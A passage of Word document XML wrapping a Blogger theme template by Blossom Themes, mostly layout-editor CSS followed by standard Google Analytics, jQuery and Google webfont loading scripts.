      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .melesa-cols-1 .columns-cell{width:100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .backface &gt; .row{position:relative;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .column-left-outer{position:absolute;left:0px;top:0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .adminpanel:before{content:url url("https://1.bp.blogspot.com/-8fs3SUfEIrw/WbEsGiwKmUI/AAAAAAAAAdA/ueQ-8W-rFaMrwfW_VOGO-5ozM4SIzPM8wCLcBGAs/w230-h300/adm2.png");position:absolute;left:30px;top:80px;width:230px;height:230px;display:table;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout{display:block;position:relative;width:100%;background:#fff;padding-top:0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .row-custom{width:100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .content{word-wrap:break-word !important;position:static !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout{display: table;height: 100%;width: 100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .content-inner{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>display: table;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>position: absolute;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>top: 0px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>left: 50px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .foot{clear: left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .column-right-inner .section-columns .columns-cell{width: 100%;display: table;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .column-right-inner .section-columns{display: table;padding-right:0px !important;padding-left: 0px !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .column-left-inner .section-columns .columns-cell{width: 100%;display: table;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .column-left-inner .section-columns{display: table;padding-right:0px !important;padding-left: 0px !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .content-outer{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>display: table;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>margin: 0 !important;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .mlsa-bottom-advert{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>display: block !important;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  max-width: 900px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  width: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  height: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  width: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  display: table;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .clear-body{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  display: table;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  clear: both;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  width: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  height: 5px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  padding: 20px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .adminpanel{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  display: table !important;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  width: 250px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  position: absolute;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  top:0px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  left: 0px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  padding-top:150px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  bottom: 0px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  height: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  z-index: 12;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  background-color: #ff1769;background: -moz-linear-gradient(45deg,#ff1769 0%,#ff1769 25%,#c471f5 100%);background: -webkit-linear-gradient(45deg,#ff1769 0%,#ff1769 25%,#c471f5 100%);background: linear-gradient(45deg,#ff1769 0%,#ff1769 25%,#c471f5 100%);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .adminpanel:before{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  content: url("https://1.bp.blogspot.com/-8fs3SUfEIrw/WbEsGiwKmUI/AAAAAAAAAdA/ueQ-8W-rFaMrwfW_VOGO-5ozM4SIzPM8wCLcBGAs/w230-h300/adm2.png");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .adminpanel .draggable-widget .widget-wrap2{background: #fff !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .kistsune-blossom .draggable-widget .widget-wrap2{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>background: transparent;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>background-image: linear-gradient( 270deg, rgb(0,186,222) 0%, rgb(74,119,244) 100%);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>background-image: -moz-linear-gradient( 0deg, rgb(0,186,222) 0%, rgb(74,119,244) 100%);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>background-image: -webkit-linear-gradient( 0deg, rgb(0,186,222) 0%, rgb(74,119,244) 100%);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>background-image: -ms-linear-gradient( 0deg, rgb(0,186,222) 0%, rgb(74,119,244) 100%);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .adminpanel #adminbar:after{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  content: "Designed by Blossom Themes";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  padding: 20px 0px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  position: relative;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  color: #fff;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  opacity: 0.6;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  margin-top:10px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  display: table;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  text-align: center;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  width: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  font-size:15px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .adminbar{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  padding-top:200px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  position: relative;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  display: block;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .kistsune-blossom{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  width: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  max-width: 900px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  box-sizing: border-box;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  padding-left: 260px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .header-logo{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  width: 40%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  float: left;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .advertisement-top{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  width: 55%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  float: left;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .n-break{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  clear: both;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .navigational-menu,body#layout .navigationmenu{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  width: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>body#layout #content-area{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  width: 35%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  float: left;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout #left-sidebar-area{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  width: 30%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  float: left;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout #right-sidebar-area{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  float: left;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>max-width:30%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .adminpanel .section &gt; h4{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  display: none;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .melesa-cols-3 .columns-cell{width:30%;float:left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .melesa-cols-2 .columns-cell{width:45%;float:left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .melesa-cols-1 .columns-cell{width:100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  background: #fff;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .section{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  background-color: #fff !important;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body#layout .adminpanel .section{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  background: transparent !important;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  border:none !important;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:template-skin&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:if cond='data:blog.url != data:blog.homepageUrl'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;style&gt;.melesa-news.wrapper,.widgetarea,#melesawids{display:none;}&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:include data='blog' name='google-analytics'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;!--jQuery--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;script src='http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js' type='text/javascript'/&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;!--Load Fonts--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      //&lt;![CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      /* You can add more configuration options to webfontloader by previously defining the WebFontConfig with your options */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      if ( typeof WebFontConfig === "undefined" ) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        WebFontConfig = new Object();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      WebFontConfig['google'] = {families: ['Montserrat:300,400,500', 'Roboto:300,400,500&amp;amp;subset=latin-ext','Open+Sans:400,600,700,800']};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      (function() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        var wf = document.createElement( 'script' );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        wf.src = 'https://ajax.googleapis.com/ajax/libs/webfont/1.5.3/webfont.js';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        wf.type = 'text/javascript';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        wf.async = 'true';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        var s = document.getElementsByTagName( 'script' )[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        s.parentNode.insertBefore( wf, s );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      })();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      //]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
      </w:r>
